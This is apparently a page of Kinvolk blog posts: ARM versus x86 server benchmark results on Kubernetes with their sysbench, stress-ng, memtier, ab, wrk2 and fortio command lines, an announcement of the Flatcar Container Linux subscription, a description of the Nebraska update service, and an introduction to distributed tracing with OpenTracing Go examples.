Raw Performance – Hyperthreading OFF
Performance per $ – Hyperthreading OFF
Raw Performance – Single
Performance per $ – Single

Operating System level Benchmarks

We use the following tests to benchmark basic runtime and operating system features:


  • fileio on a tmpfs in-memory filesystem (I/O to 128 files in parallel; stresses the OS kernel)
  • spawn, sem (POSIX process creation, semaphore operations; stresses the OS kernel)
  • shm (8 MB shared memory creation/destruction; stresses the OS kernel and memory)
  • crypt, hsearch, tsearch, lsearch, bsearch, qsort (C library functions)
  • atomic (compiler-intrinsic atomic memory operations)


The benchmark pods run on the Kubernetes worker node with a run length of 30 seconds and multiple iterations directly after each other. Here are the effective command lines for the linked container images; the thread count is varied from the number of CPU threads, to the number of cores, to a single thread:

sysbench fileio --file-test-mode=rndwr prepare (ran before the benchmark on a tmpfs in-memory filesystem)
sysbench --threads=$PARAMETER --time=30 fileio --file-test-mode=rndwr run (done on the tmpfs in-memory filesystem)
stress-ng --(spawn|sem|shm|crypt|hsearch|tsearch|lsearch|bsearch|qsort|atomic) --threads=$PARAMETER --timeout 30s --metrics-brief


Ampere’s eMAG displays a significant advantage in memory-heavy and operating-system-related tasks that do not require locking. Locking operations push the eMAG to third position with regard to raw performance, and to second when cost is factored in.

AMD’s EPYC takes the lead when synchronization and locking is a factor, both in terms of raw performance as well as for performance/cost.

Intel’s XEON delivers better performance than AMD’s EPYC in non-locking OS-related tasks, but falls back to third position when cost is factored in.

System library related tasks are performed best on eMAG when throughput is a factor – eMAG takes a solid lead in the qsort and crypt micro-benchmarks. Intel’s XEON delivers the best performance for search and lookup primitives, with AMD taking the lead when cost is a factor. AMD’s EPYC is, by some margin, the fastest with atomic memory operations, with Intel’s XEON coming in second, and Ampere’s eMAG in a distant third position.

sysbench fileio on a tmpfs in-memory filesystem

The setup uses a Kubernetes emptyDir Volume backed by the Memory medium which results in a tmpfs mount.
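For reference, such a volume can be declared in a pod spec roughly like this; a hedged sketch, where the pod name, container name, image, and mount path are all illustrative placeholders, not the actual benchmark manifest:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: fileio-bench              # illustrative name
spec:
  containers:
  - name: sysbench
    image: example.org/sysbench   # placeholder image
    volumeMounts:
    - name: bench-dir
      mountPath: /bench           # sysbench fileio would run in this directory
  volumes:
  - name: bench-dir
    emptyDir:
      medium: Memory              # backs the emptyDir with tmpfs (RAM)
```

With medium: Memory, files written to the mount never touch a disk, so the fileio benchmark measures kernel and memory performance rather than storage.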

Ampere’s eMAG excels at raw file system performance on a tmpfs – writing small amounts of data to many files, with XEON coming in as a close second. The eMAG’s lead over Intel’s XEON increases when cost is factored in, and AMD’s EPYC moves up to the second position.

Raw Performance
Performance per $

stress-ng spawn

The spawn micro-benchmark exercises process generation (using the POSIX spawn API) and process deletion, a basic functionality of operating systems. Ampere’s eMAG leads in the results, with Intel’s XEON being a close second in terms of raw performance. With cost factored in, XEON falls back to the last position, and AMD’s EPYC takes the second position.

Raw Performance
Performance per $

stress-ng sem

This micro-benchmark gauges semaphore performance, acquiring and releasing semaphores in rapid succession. Ampere’s eMAG leads in performance (operations per second) at the physical-core level, but AMD’s EPYC and Intel’s XEON really benefit from hyperthreading, pushing the eMAG to the last position if you can accept the security implications of turning HT on. When cost is factored in, AMD’s EPYC leads by a large margin, with eMAG and XEON coming in second and third, respectively.

Raw Performance
Performance per $

stress-ng shm

The shared memory micro-benchmark creates and destroys multiple shared memory objects per thread, using the POSIX API. Just as with the memory I/O hardware benchmark above, we see the eMAG leaving both XEON and EPYC far behind. Intel’s XEON comes in second in terms of raw performance, and AMD’s EPYC takes the second position when cost is factored in.

Raw Performance
Performance per $

stress-ng crypt, hsearch, tsearch, lsearch, bsearch, qsort, atomic

The graph below covers a number of stress-ng micro-benchmarks that concern the performance of both the standard library and the compiler. atomic tests the __atomic compiler intrinsics, crypt executes hashing algorithms (MD5, SHA-256, SHA-512), and the *search tests and qsort perform various lookup and sort functions on 32-bit integer values.

The results are normalized to Ampere eMAG having the value 1.0 for each benchmark.
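The normalization itself is a simple division; here is a hypothetical sketch with made-up scores (in this toy version, the eMAG line must come first for each benchmark):

```shell
# Divide each system's score by the eMAG score of the same benchmark,
# so that eMAG ends up at 1.00. All numbers below are made up.
printf 'qsort emag 120\nqsort epyc 90\nqsort xeon 100\n' |
awk '$2 == "emag" { base[$1] = $3 }
     { printf "%s %s %.2f\n", $1, $2, $3 / base[$1] }'
# → qsort emag 1.00
#   qsort epyc 0.75
#   qsort xeon 0.83
```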

Normalized performance:

Normalized performance per $:

Cloud-Native Application Benchmarks

We ran benchmarks for memcached, Redis, and nginx to get a better understanding of the overall performance when executing complex cloud-native workloads.

Memcached and Redis

  • memtier_benchmark, a high-performance key-value store benchmark from Redis

NGINX

  • ab (ApacheBench) to measure the maximum number of HTTP req/sec
  • wrk2 to measure tail latency performance as the maximal latency that 99.9% of the HTTP requests encountered (allowing for 0.1% outliers in each run)

fortio

  • fortio for HTTP/1.1 and gRPC (HTTP/2) latency performance, as with wrk2 but without accounting for Coordinated Omission

Memcached memtier

The setup consisted of the memcached database and the memtier database client running on the same system. Therefore, the thread count was divided by 2 so that the database and the client each use one half of the CPUs.

The benchmark pods run on the Kubernetes worker node with a run length of 30 seconds and multiple iterations directly after each other. Here are the effective command lines for the linked container images; the thread count is varied from half the number of CPU threads, to half the number of cores, to a single thread:

Background database: memcached -t $THREADS
Foreground client: memtier_benchmark -P memcache_binary -t $THREADS --test-time 30 --ratio 1:1 -c 25 -x 1 --data-size-range=10240-1048576 --key-pattern S:S

The extra arguments specify that the ratio of get to set operations is 1:1, 25 connections are used, one iteration (because we rerun the process for multiple iterations), an object size ranging from 10 KiB to 1 MiB, and a sequential key pattern for both get and set operations.

With memcached, Ampere’s eMAG benefits from its significantly higher multi-thread memory bandwidth, leading the field by a large margin. AMD’s EPYC offers a better price/performance ratio than Intel’s XEON.

Raw Performance
Performance per $

Redis memtier

Redis is an in-memory key-value store, but compared to memcached above, it is single-threaded by nature. To test multiple cores/CPUs we launched multiple Redis server instances and memtier client instances, benchmarked them in parallel, and summed up the results.

The benchmark pods run on the Kubernetes worker node with a run length of 30 seconds and multiple iterations directly after each other. Here are the effective command lines for the linked container images; the process count is varied from half the number of CPU threads, to half the number of cores, to a single process:

Background database processes: redis-server --port $PROCESS_PORT
Foreground client processes: memtier_benchmark -p $PROCESS_PORT -P redis -t 1 --test-time 30 --ratio 1:1 -c 25 -x 1 --data-size-range=10240-1048576 --key-pattern S:S

The results for all processes are summed up in an additional step. The extra arguments specify that the ratio of get to set operations is 1:1, 25 connections are used, one iteration (because we rerun the process for multiple iterations), an object size ranging from 10 KiB to 1 MiB, and a sequential key pattern for both get and set operations.
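The summing step could look something like the following hedged sketch. It assumes each per-process run leaves a log containing a Totals line whose second column is the ops/sec figure; check the exact column layout against your memtier_benchmark version:

```shell
# Two fake per-process logs, standing in for real memtier_benchmark output:
printf 'Totals 1000.50 500 500 1.2 800\n' > memtier-1.log
printf 'Totals 2000.25 900 900 1.3 900\n' > memtier-2.log

# Sum the ops/sec column (column 2, an assumption) across all processes:
awk '/^Totals/ { sum += $2 } END { printf "%.2f\n", sum }' memtier-*.log
# → 3000.75
```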

All three contenders perform about the same when compared at the physical cores level. With hyperthreading enabled – and the respective security implications accepted – Intel’s XEON clearly moves ahead of the field. AMD’s EPYC has a small gain from hyperthreading, too, leaving eMAG at the third position. AMD also excels at cost/performance running redis, with eMAG in the second position.

Raw Performance
Performance per $


NGINX ab

We use Apache’s ab to benchmark NGINX’s HTTP throughput in requests per second. As with all other network tests (iperf3 and the following latency tests), the client is an Intel XEON node in all cases, and the TCP connections in Kubernetes are pod-to-pod over Calico’s IP-in-IP overlay network. We used 56 connections because the fixed XEON client has 56 CPU threads.

The benchmark has a run length of 30 seconds and multiple iterations directly after each other.

The effective command lines for the linked containers are as follows:

Benchmarked worker node with server pod: nginx
Fixed XEON worker node with client pod: ab -c 56 -t 30 -n 999999999 http://$POD_IP:8000/ (The high number of requests just ensures that only the 30-second timeout terminates the benchmark, and not the number of sent requests, which defaults to 50000 when -t is used.)

AMD’s EPYC and Intel’s XEON benefit from their significantly better networking performance (see the iperf benchmark above), leaving eMAG at the third position when raw performance is the main concern. Hyperthreading on both XEON and EPYC does not have a noticeable impact on performance, though it adds more jitter in performance when activated. Ampere’s eMAG benefits from its competitive pricing when cost is a concern, moving up to the second position.

Raw Performance – Hyperthreading ON
Performance per $ – Hyperthreading ON
Raw Performance – Hyperthreading OFF
Performance per $ – Hyperthreading OFF

NGINX wrk2

Wrk2 is somewhat of a Kinvolk favorite and has been used in previous work of ours. It’s the only benchmark tool we’re aware of that takes Coordinated Omission into account, which is important for realistically measuring latency in overload situations. Wrk2 issues requests at a constant rate and calculates each latency from the point in time where the request should have been sent, instead of sending requests at the actual (possibly lower than requested) rate and measuring latencies only from when requests are actually sent.
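The correction can be illustrated with a toy calculation (this is the principle, not wrk2’s actual implementation): at a constant rate R, request i should leave at i/R seconds after the start, so its latency is measured from that intended time. All numbers below are made up:

```shell
R=2000   # requests per second (matches the fixed rate used below)
# Columns: request index, actual send time (s), completion time (s).
printf '0 0.0000 0.0010\n1 0.0005 0.0015\n2 0.0300 0.0310\n' |
awk -v r=$R '{ intended = $1 / r
               printf "req %d corrected latency: %.4f s\n", $1, $3 - intended }'
# → req 2 reports 0.0300 s: although it completed 1 ms after it was actually
#   sent, the client had stalled ~29 ms past the intended send time.
```

Without the correction, the stalled request 2 would misleadingly report a 1 ms latency, hiding the overload from the percentile statistics.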

As with all other network tests, the client is an Intel XEON node in all cases, and the TCP connections in Kubernetes are pod-to-pod over Calico’s IP-in-IP overlay network. We used 56 connections because the fixed XEON client has 56 CPU threads. The request rate is fixed at 2000 requests per second so that no system is overloaded (cf. the ab results above). The request body has a length of 100 bytes.

The benchmark has a run length of 60 seconds and multiple iterations directly after each other.

The effective command lines for the linked containers are as follows:

Benchmarked worker node with server pod: nginx
Fixed XEON worker node with client pod: wrk -d 60s -c 56 -t 56 -R 2000 -L -s /usr/local/share/wrk2/body-100-report.lua http://$POD_IP:8000/

The minimal observed p999 latency was similar across all systems in all datacenter regions. However, there is a lot of jitter and cases with worse p999 latency for the Intel XEON systems.

We made a second run with Hyperthreading disabled (instead of forcing nginx to use only half of the CPU threads, because we cannot control the number of kernel threads of the network stack) and did not observe large jitter, but also had fewer samples.

Not visible in the charts is that the Intel XEON server is twice as expensive; there is no meaningful way to display the system cost in relation to the resulting latency, since adding more parallel systems won’t reduce the p999 latency of a single system.

HTTP P999 Tail Latency With Coordinated Omission (lower is better) – Hyperthreading ON
Hyperthreading OFF

fortio client with a fortio server

We use fortio to measure p999 latency, both for HTTP 1.1 as well as for gRPC (HTTP2). We used 20 connections and fixed the request rate to 2000 req/s.

As with all other network tests, the client is an Intel XEON node in all cases, and the TCP connections in Kubernetes are pod-to-pod over Calico’s IP-in-IP overlay network.

The benchmark has a run length of 60 seconds and multiple iterations directly after each other.

The effective command lines for the linked containers are as follows:

Benchmarked worker node with server pod: fortio server -ui-path ''
Fixed XEON worker node with client pod for HTTP/1.1: fortio load -c 20 -qps=2000 -t=60s -payload-size=50 -keepalive=false $POD_IP:8080

For HTTP/1.1, the observed minimal p999 latencies were similar across all systems and datacenter regions. This time there was jitter for the AMD EPYC systems, with outliers that distort the whole graph.

Ampere’s eMAG had a p999 latency of ~4 ms, AMD’s EPYC ~3-4 ms not counting the outliers, and Intel’s XEON ~3-7 ms.

We made a second run with Hyperthreading disabled (instead of manually fixing fortio to half of the CPU threads, because we cannot control the number of kernel threads of the network stack) and did not observe large jitter, but also had fewer samples.

HTTP/1.1 P999 Tail Latency (lower is better) – Hyperthreading ON
HTTP/1.1 P999 Tail Latency (lower is better) – Hyperthreading OFF

For gRPC (HTTP/2) we used 20 connections but with 10 HTTP/2 streams per TCP connection. The request rate was fixed to 2000 req/s.

The benchmark has a run length of 60 seconds and multiple iterations directly after each other.

The effective command lines for the linked containers are as follows:

Benchmarked worker node with server pod: fortio server -ui-path ''
Fixed XEON worker node with client pod for gRPC: fortio load -grpc -s 10 -c 20 -qps=2000 -t=60s -payload-size=50 -keepalive=false $POD_IP:8079

Both AMD’s EPYC and Intel’s XEON deliver solid latency results for gRPC, about 3 times their HTTP/1.1 latency. Ampere’s eMAG struggles with gRPC and displays massive jitter in its response times.

We made a second run with Hyperthreading disabled again, and even though we had fewer samples in this run, the previous findings were confirmed.

gRPC P999 Tail Latency (lower is better) – Hyperthreading ON
gRPC P999 Tail Latency (lower is better) – Hyperthreading OFF


Conclusion

First of all, Lokomotive Kubernetes and Flatcar Container Linux worked well on arm64 with Ampere’s eMAG. Even hybrid clusters with both arm64 and x86 nodes were easy to use, either with multi-arch container images or with the built-in Kubernetes labels as node selectors.

Overall, Ampere’s eMAG offers a good price/performance ratio. The surprising benchmark results are those where Ampere’s eMAG takes the lead for a certain set of use cases.

It excels at multi-thread performance, particularly with memory-I/O-heavy and throughput-related workloads (e.g. multi-threaded key-value stores and file operations on a tmpfs). These are the clear cases where switching the server type would pay off. The eMAG also feels well-positioned for cloud-native workloads, which tend to fully commit memory and compute resources to pods.

AMD’s EPYC has a slight integer/floating-point processing advantage in vector arithmetic, is in the same cost range as the eMAG, and offers faster IP-in-IP overlay networking, but suffers from lower overall multi-thread throughput.

Intel’s XEON, while leading with raw performance in a number of benchmarks, comes in last when cost is factored in.

Attached is a performance-per-cost summary graph for the above benchmarks, normalized to the eMAG results, to the EPYC results, and to the XEON results for easy comparison.

Compiler and application optimizations for arm64 will likely change the results in the future, in particular for those cases where a huge difference was observed (the iperf3 IP-in-IP scenario is certainly a focus area where we can expect them soon; others are memcpy/memmove and atomics). It will also be interesting to repeat such a benchmark on the next generations from the three manufacturers, given that the eMAG is the first offering of Ampere Computing. The benchmark code is available for reproducibility.

Future Work

We are currently in the process of productizing and polishing Arm support in both Flatcar Container Linux and Lokomotive Kubernetes, and will announce general availability in the near future.

Benchmark tools and benchmark automation are publicly available, and may see support for other CPU architectures in the future.


Normalized performance/cost summary graph for eMAG:

Normalized performance/cost summary graph for EPYC:

Normalized performance/cost summary graph for XEON:

Announcing the Kinvolk Flatcar Container Linux Subscription

Back in March last year, following Red Hat’s acquisition of CoreOS, Inc., we announced Flatcar Container Linux, a fork of CoreOS Container Linux. At the time, we saw this as a kind of insurance policy for a future when Red Hat might terminate ongoing support and maintenance of the widely-deployed CoreOS platform. As we put it at the time:

The strongest open source projects have multiple commercial vendors that collaborate together in a mutually beneficial relationship. This increases the bus factor for a project. Container Linux has a bus factor of 1. The introduction of Flatcar Linux brings that to 2.

Today we announced the general availability of the Kinvolk Flatcar Container Linux Subscription. The subscription includes:

  • technical support including optional 24x7x365 response time service level agreement
  • access to the Kinvolk customer portal for ticket management and knowledge base articles
  • new software releases across four delivery channels: stable, beta, alpha and edge (experimental)
  • regular security updates
  • the new Kinvolk Update Service, available hosted or on-prem, for fine-grained control and visibility of Flatcar updates across an entire fleet of machines (for more about the Kinvolk Update Service and the technology behind it, check out this post by project lead Joaquim Rocha)

We are particularly pleased at the broad welcome this announcement has received from both end users and our industry partners:

“As we realized CoreOS Container Linux was reaching end of support, we reached out to the team at Kinvolk and were impressed by their commitment to the original CoreOS vision, and their ability to support us through a seamless transition to Flatcar. With a Flatcar Container Linux subscription in place, we now feel comfortable that we have a viable long-term platform strategy.”
– Michael Ferraro, VP Platform at UpGuard

“We believe Flatcar Container Linux will be welcomed by developers and administrators who rely on CoreOS today for its lightweight approach, built-in support of the Docker container engine, and as a proven platform for Docker Enterprise.”
– Justin Graham, VP Product Management at Docker, Inc.

“We’re longtime fans of CoreOS Container Linux, and it remains the most popular substrate for container environments in our bare metal cloud. With Flatcar Container Linux, the community now has a strong roadmap upon which to continue the momentum of CoreOS, backed by a proactive support model and the stellar Kinvolk team. We are inviting our CoreOS users to migrate to Flatcar Container Linux, which has been fully integrated into the Packet platform.”
– Zac Smith, CEO at Packet, a leading bare metal cloud provider based in New York

“At Container Solutions, we’re in the business of helping customers shift their businesses to modern software development and deployment practices. CoreOS Container Linux has been one of our customers’ most popular options, so we are pleased to see Kinvolk taking the initiative to enable them to continue with the same software foundation on a commercially supported basis.”
– Jamie Dobson, CEO at Container Solutions

“CoreOS Container Linux has seen wide adoption across the industry, and many users are looking for a path forward that doesn’t entail significant operational disruption. Over the past 18 months, Kinvolk has demonstrated their commitment and ability to do this with Flatcar Container Linux, and I’m pleased to see they are now backing that up with commercial support and managed update service.”
– Joe Sandoval, SRE Manager, Infrastructure Platform at Adobe, and OpenStack User Committee member

“We are excited to be collaborating with Kinvolk to enable an upgrade path for our customers who are currently deploying Kubernetes with CoreOS, as well as supporting future Kubernetes adopters who need a secure operating system foundation.”
– Matt Barker, CEO at Jetstack, a leading Kubernetes consultancy based in London, UK

“At Giant Swarm, we strongly believe in the minimal and immutable container Linux approach, which is why we built our managed Kubernetes service on CoreOS (in part with the help of Kinvolk’s engineering team). Going forward, Flatcar Container Linux offers us an identical operational experience, with the commitment to long-term maintenance, support and security updates that we need to ensure a stable platform for our demanding enterprise customers such as Adidas and Vodafone.”
– Timo Derstappen, chief technology officer, Giant Swarm

“The market is looking for a container Linux distribution maintained by an independent, community-oriented team, and Kinvolk has the right pedigree to deliver it. We are excited to collaborate with them to help our Kubermatic Kubernetes Platform customers adopt Flatcar Container Linux.”
– Sebastian Scheele, co-founder and CEO, Loodse

The Kinvolk Flatcar Container Linux Subscription is available today, and is already being adopted by multiple large enterprise customers across thousands of container hosts. Pricing is per node (physical or virtual, without CPU limits). From now until March 31, 2020, Kinvolk will commit to matching the price of any existing CoreOS Container Linux support contract, and will beat it by at least 10% for the first year’s subscription.

Download the Flatcar Container Linux datasheet for details, or get in touch to find out more.

Announcing the Kinvolk Update Service and Nebraska Project

Today we are announcing the Kinvolk Flatcar Container Linux Subscription, which includes a new managed service, the Kinvolk Update Service. This is covered in more detail in another blog post.

In this post, we’ll dive into the details of the Kinvolk Update Service and share more about its heritage, functionality, and implementation. Of course, the Kinvolk Update Service is built on 100% Open Source Software, which we are also making available today on GitHub as the Nebraska project.


When running a number of Flatcar Container Linux instances that compose a cluster, it is useful to have a tool to roll out updates and to monitor the status of the instances and the progress of those updates. For example: how many instances are currently downloading version X.Y.Z in our cluster? And how many should be updated to the new beta version?


Flatcar Container Linux is based on CoreOS Container Linux, and there is an official update-manager solution for CoreOS in the form of a web application called CoreUpdate. However, it is not Open Source and was only available with a paid CoreOS subscription.

Luckily, an Open Source alternative called CoreRoller existed. This project offered most of the functionality we desired for our Flatcar Container Linux subscription clients, but it had been inactive for a few years, which in JavaScript years (the language of its frontend) meant a large number of CVEs in outdated Node packages, as well as other deprecated or inactive libraries.

While CoreRoller provided a good starting point, we wanted to build a more advanced solution for the Kinvolk Update Service. Specifically, we aimed to provide a more modern UI and other ways to visualize the updates and states of the cluster. Besides that, we also needed to be able to deploy this new service to clients and update it quickly in case of new security fixes or new features. So we concluded that the easiest way to do all this was to build our own version, starting from and building on the great work done by the authors of CoreRoller.

This new project is called Nebraska and is, of course, completely Open Source software. It powers the Kinvolk Update Service, which is a branded build of Nebraska, hosted and managed by Kinvolk for our subscription customers. There is no community-versus-corporate versioning strategy here; as with all Kinvolk software, customers can feel safe knowing there is no vendor lock-in behind our offering of the Kinvolk Update Service with their Flatcar Container Linux Subscriptions.


So what can the Kinvolk Update Service do for you? What functionality does it have?

Here is a summarized list of capabilities:

  • Control of updates behavior / rate limiting
  • Custom groups and channels
  • Update progress overview
  • Versions evolution timeline
  • Detailed history per machine
  • Authentication through GitHub
  • Distribution of updates payload or redirection
  • Automatic fetch of new packages’ metadata
  • … (we’ll keep working on more!)

How it’s built

The Kinvolk Update Service, or Nebraska, is composed of a backend written in Go, and a frontend in the form of a web app using React and Material UI. A typical deployment is illustrated in the following diagram:

One thing that’s illustrated in the diagram but may not be obvious is that Nebraska is a passive service: the instances connect to it to report their status, rather than Nebraska connecting to the instances. So all the data maintained and displayed by Nebraska is about past events (those that happened in the last 24 hours, by default).


In order to better understand the capabilities of the Kinvolk Update Service when it comes to representing one’s clusters, it’s important to look into its architecture.

The first actor in this architecture is the Application, or App. It represents the entity whose updates we monitor and manage. An obvious and common example of an Application in this sense is Flatcar Container Linux, but the Kinvolk Update Service can actually support any other application that speaks the protocol it uses for managing updates. This protocol is called Omaha and was created by Google for managing the updates of apps like Chrome and Google Earth. Thus, any application or service that uses the Omaha protocol can be expected to work with the Update Service.
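For illustration only, a minimal Omaha update-check request might look roughly like the following; the app id, version, and track shown here are placeholders, not real Flatcar identifiers:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0">
  <!-- appid, version and track are illustrative placeholders -->
  <app appid="{00000000-0000-0000-0000-000000000000}" version="1.0.0" track="stable">
    <updatecheck></updatecheck>
  </app>
</request>
```

The server’s XML response either points the client at a new Package or indicates that no update is available.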

An Application may have one or more groups. A Group is a very important part of the architecture, since it is where the policy for the actual updates is defined. i.e. what update is to be rolled out, when, to how many instances, at what times, etc. is all defined per Group.

What a Group represents is entirely up to the user though. It may be one flavor of software (e.g. the Edge variant for Flatcar Linux), a geo-location of a cluster (e.g. Central European Cluster), different deployment clusters (e.g. Test Cluster), etc. It is entirely up to the user to choose what Groups represent.

Groups need to know which software and version to provide to their instances, and that’s provided by the next level in our architecture, called Channels. However, Channels don’t hold the package information directly, but instead point to the last level in the architecture: Packages.

A common question at this point is usually: “Why is this level of indirection needed? Why can’t Groups just contain the software+version that compose the actual update, or point themselves to a Package object?”

This is best answered with an example: if several Groups need to point to the stable version of some software, we only need one Channel representing that stable version and point the Groups to it. Then, when the stable version is bumped (i.e. the Channel starts pointing to a new Package), all the Groups automatically pick it up, instead of each Group having to be edited to point to the new Package.
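To make the Group → Channel → Package indirection concrete, here is a minimal sketch in Go (the language Nebraska’s backend is written in). The type and field names are our illustration, not Nebraska’s actual data model:

```go
package main

import "fmt"

// Package is a concrete update payload at a specific version.
type Package struct {
	Version string
}

// Channel points at the Package currently considered, e.g., "stable".
type Channel struct {
	Name string
	Pkg  *Package
}

// Group defines rollout policy and follows a Channel.
type Group struct {
	Name    string
	Channel *Channel
}

// CurrentVersion returns the version a group's instances should update to,
// resolved through the channel indirection.
func (g *Group) CurrentVersion() string {
	return g.Channel.Pkg.Version
}

func main() {
	stable := &Channel{Name: "stable", Pkg: &Package{Version: "2345.3.0"}}
	groups := []*Group{
		{Name: "us-west", Channel: stable},
		{Name: "central-europe", Channel: stable},
	}

	// Bumping the channel to a new package updates every group at once;
	// no group needs to be edited individually.
	stable.Pkg = &Package{Version: "2345.3.1"}

	for _, g := range groups {
		fmt.Printf("%s -> %s\n", g.Name, g.CurrentVersion())
	}
}
```

Because both groups share the same Channel, repointing the channel at a new Package is enough for every group to serve the new version.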

Finally here are two similar diagrams, one illustrating what was described above, and the other with an example:

This setup should allow enough flexibility to represent any cluster layout. But let’s look at some example use-cases to get a more practical idea of what this project allows.

Use Cases

Rate Limiting

A company has a single cluster of Flatcar Linux machines. It wants the machines to be updated as new stable versions of Flatcar Linux become available, but only 10 machines per hour should be updated (so that if a number of them fail, it is more noticeable).

What can be done:

  • Run the Kinvolk Update Service with the syncer enabled, to get the stable channel updated automatically;
  • Create a group for the cluster, pointing to the stable channel;
  • Watch the success rate for updates as they happen.

Two Different Purpose Clusters

A team is responsible for 2 clusters: Production + Testing. They want the Testing cluster to have its machines updated to Flatcar Linux Stable version automatically and as soon as it becomes available. The Production cluster on the other hand needs to be running the stable version but updates should be started when QA gives the green light (after using the Testing cluster), and updates should be done safely (1 machine at a time, abort when there’s a failure).

What can be done:

  • Testing’s updates can be triggered automatically, for as many instances at a time as desired, as soon as the new stable version becomes available (which happens automatically when using the syncer option).
  • Production’s updates can be triggered manually (i.e. its Group will have updates disabled by default), and have the Safe option turned on (1 instance updated at a time, abort on first failure).

Different Geo-locations

A global company has two clusters: one in San Francisco, California, and one in Berlin, Germany. Their instances should be updated automatically, but only during the respective office hours.

What can be done:

  • Run the Kinvolk Update Service with the syncer enabled, to get the desired channel updated automatically;
  • Set up a group for each geo-location (they can be called US West Coast, and Central Europe for example);
  • Set up the timezone/office hours for each group and enable updates.


There are certainly improvements we can make to the Kinvolk Update Service / Nebraska, and Kinvolk will keep investing in it. Some ideas we aim to implement in the future are:

  • CLI for managing and testing;
  • More ways to visualize the gathered information (new charts, tables, etc.);
  • Custom timeline filtering;
  • Performance improvements;
  • UX improvements.

Finally, as previously mentioned, Nebraska is 100% open source and we welcome contributions. If you have a bug fix to add or a feature to implement, we recommend first opening an issue in its GitHub project and discussing it there before writing the code (especially if it is a complex feature).

The Kinvolk team hopes you enjoy its new product. We’d love to hear your thoughts and feedback - via email ([email protected]), or Twitter (@kinvolkio).

A Shallow Dive Into Distributed Tracing

We at Kinvolk were excited to begin working recently with the amazing team over at LightStep on distributed tracing. I must admit that, while I was aware of the OpenTracing project and knew it was probably kind of important, I did not know a whole lot about the topic when we first started chatting about it at KubeCon in Barcelona.

Since then, through our engagement with LightStep, I’ve learned a little bit about the topic and I’d love to share some of those learnings.

Important note: I am a complete novice learning about the topic for the first time. I do not claim to be an expert in this field — hence why I’m calling this a “shallow dive”. I look forward to learning from all the smart people who I hope will point out what I’ve got wrong or oversimplified!


The first thing I learned diving into this space is that there is a broad concept of “observability”, which is traditionally viewed as a combination of three things (which are often conflated or misunderstood):

  • Logs
  • Metrics
  • Tracing

Logs are pretty well understood - applications have been emitting logs for many years, with varying levels of structure, and tools like fluentd provide means of processing them in large volume.

Metrics - quantified measures of application performance over time - are super useful because they provide easily understandable and immediately actionable data. Projects such as Prometheus have emerged to track metrics at scale.

Tracing is perhaps the most powerful element of observability, and what we are going to dive into with the rest of this blog post.

I should mention there’s an open question about whether you should capture absolutely every data point coming from your system (see: LightStep’s Satellite Architecture), or whether it’s better to sample (e.g. capture one of every 100 metrics). That seems to be an ideological debate that I am not sufficiently expert to weigh in on, but it would appear there are good people on both sides. In any case, the popular tracing libraries all support optional sampling so you can decide what is best for your application.

Distributed Tracing

With the advent of microservices, a single request can lead to dozens or hundreds of separate API calls over network interfaces. While each of the microservices involved may be writing its own logs, making sense of the end-to-end chain that represents the processing related to a single request requires correlating and sequencing event logs (and potentially related metrics) across all the microservices involved.

How it Works

One of the barriers to understanding distributed tracing (like any specialist field) is that it has its own terminology. A good place to start is the fundamental concept of the span.

A span is a named, timed operation representing a chunk of the workflow. Spans can reference other spans in a hierarchical manner (i.e. parent/child). A root span has no parent, and might be (for example) a web request for a particular page. Child spans might be specific pieces of work that are performed to render that page. These references generally represent causal information, i.e. this span was triggered by work performed in this other span. OpenTelemetry goes even further, allowing more complex link relationships between spans (e.g. multiple parents).

A group of spans referencing each other together make up a trace.

This example from the OpenCensus documentation might help to visualize these relationships:

In this example, a request is made to the /messages URL, which first triggers a user authorization step, a cache query and then (because there is a cache miss), a database lookup and populating the cache with the results. The auth, cache.Get, mysql.Query and cache.Put spans are all child spans of the /messages span, and all the spans together comprise a single trace.

In a distributed system, a trace typically encompasses more than one microservice. To make this work, a span context object is passed along with the regular in-process or RPC function calls, carrying all the information the tracing system needs to associate events with the current span.

One thing that might be obvious, but which I found quite cool, is that a span can be server or client side, enabling a distributed tracing system to present a coherent view from the front-end code running in a browser to the back-end server fulfilling the client request.

Another thing I really liked is that spans have tags (each a key/value pair), which allow for selector operations just like you would be used to with Kubernetes objects.

Manual vs Automated Instrumentation

So we’ve established that traces comprise spans, which are created in a context which is shared around a distributed system. But how does the tracing system know when a span is created, and how is the context shared across function calls (local in-process, or remote across the network)?

The basic approach is for the programmer to add a few simple API calls to their code. For example, this would start a root span:

    func xyz() {
        sp := opentracing.StartSpan("operation_name")
        defer sp.Finish()
        ...
    }

And this would create a child span of an existing span:

    func xyz(parentSpan opentracing.Span, ...) {
        sp := opentracing.StartSpan(
            "operation_name",
            opentracing.ChildOf(parentSpan.Context()))
        defer sp.Finish()
        ...
    }

If the span context needs to be serialized on the wire, this can be done like this:

    func makeSomeRequest(ctx context.Context) ... {
        if span := opentracing.SpanFromContext(ctx); span != nil {
            httpClient := &http.Client{}
            httpReq, _ := http.NewRequest("GET", "http://myservice/", nil)

            // Transmit the span's TraceContext as HTTP headers on our
            // outbound request.
            opentracing.GlobalTracer().Inject(
                span.Context(),
                opentracing.HTTPHeaders,
                opentracing.HTTPHeadersCarrier(httpReq.Header))

            resp, err := httpClient.Do(httpReq)
            ...
        }
        ...
    }

And so on.

As you can see, adding tracing in this way is straightforward, but it is not automatic.

The “holy grail” of tracing is that it should be possible to add it to any program without requiring any work on the part of the programmer. In practice, how achievable that goal is depends on the language and libraries used. The OpenTracing Registry is a good way to see if a specific library already has helpers for instrumentation. Some commercial solutions offer this kind of capability, and OpenTracing has an implementation of automated tracing for Java with its Special Agent.

OpenTracing? OpenCensus? No, OpenTelemetry!

This brings us onto the topic of implementations of distributed tracing.

Modern distributed tracing can trace (pun intended, sorry) its roots back to a Google white paper on its internal system, known as Dapper (co-created by Ben Sigelman, who went on to found LightStep). This introduced terms such as span and trace context for the first time, and inspired the open source project OpenTracing which defined an API that could be implemented by multiple plug-in “tracers”.

OpenTracing was adopted by the Cloud Native Computing Foundation, the home of Kubernetes and many other related projects, and became widely adopted by projects such as Jaeger (also in the CNCF but originally by Uber), and commercial solutions such as DataDog and LightStep.

In a parallel effort, Google evolved its internal distributed tracing and metrics solution with a project known as Census, which it open sourced early in 2018 as OpenCensus. Unlike OpenTracing which defined an API that could have multiple independent implementations, OpenCensus defined both the API and implementation. It also included support for metrics as well as tracing, so had more functionality.

There were clearly pros and cons to each approach - OpenTracing enabled a vibrant ecosystem, whereas OpenCensus had a rich solution, proven at Google, that worked out of the box. But OpenTracing and OpenCensus cannot be used together on the same system, leading to potential fragmentation of the tracing community.

